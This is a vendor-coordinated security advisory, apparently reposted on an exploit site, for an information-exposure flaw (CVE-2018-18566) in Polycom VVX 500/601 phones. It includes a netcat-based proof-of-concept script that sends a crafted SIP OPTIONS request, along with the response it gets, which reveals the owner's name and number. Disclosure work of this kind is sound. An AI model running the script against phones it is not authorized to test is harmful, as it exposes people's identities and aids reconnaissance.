Exploit for hardware platform in category local exploits
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
Product: VVX 500 / VVX 601
Manufacturer: Polycom
Affected Version(s): <= 5.8.0.12848
Tested Version(s): 5.4.0.10182, 5.8.0.12848
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-08-29
Solution Date: 20??-??-??
Public Disclosure: 2018-10-23
CVE Reference: CVE-2018-18566
Authors of Advisory: Micha Borrmann (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Script getdatafrompolycom.sh
#!/bin/sh
# Micha Borrmann <[email protected]>
OWNIP=192.168.100.102
if [ -z "$1" ]
then
echo "Please enter an IPv4 address as target"
exit
else
TARGET=$1
fi
echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060
Start the script against a phone and see the result:
$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Install the new firmware which has disabled the SIP service by default.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product web sites for the phones
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
# 0day.today [2018-10-25] #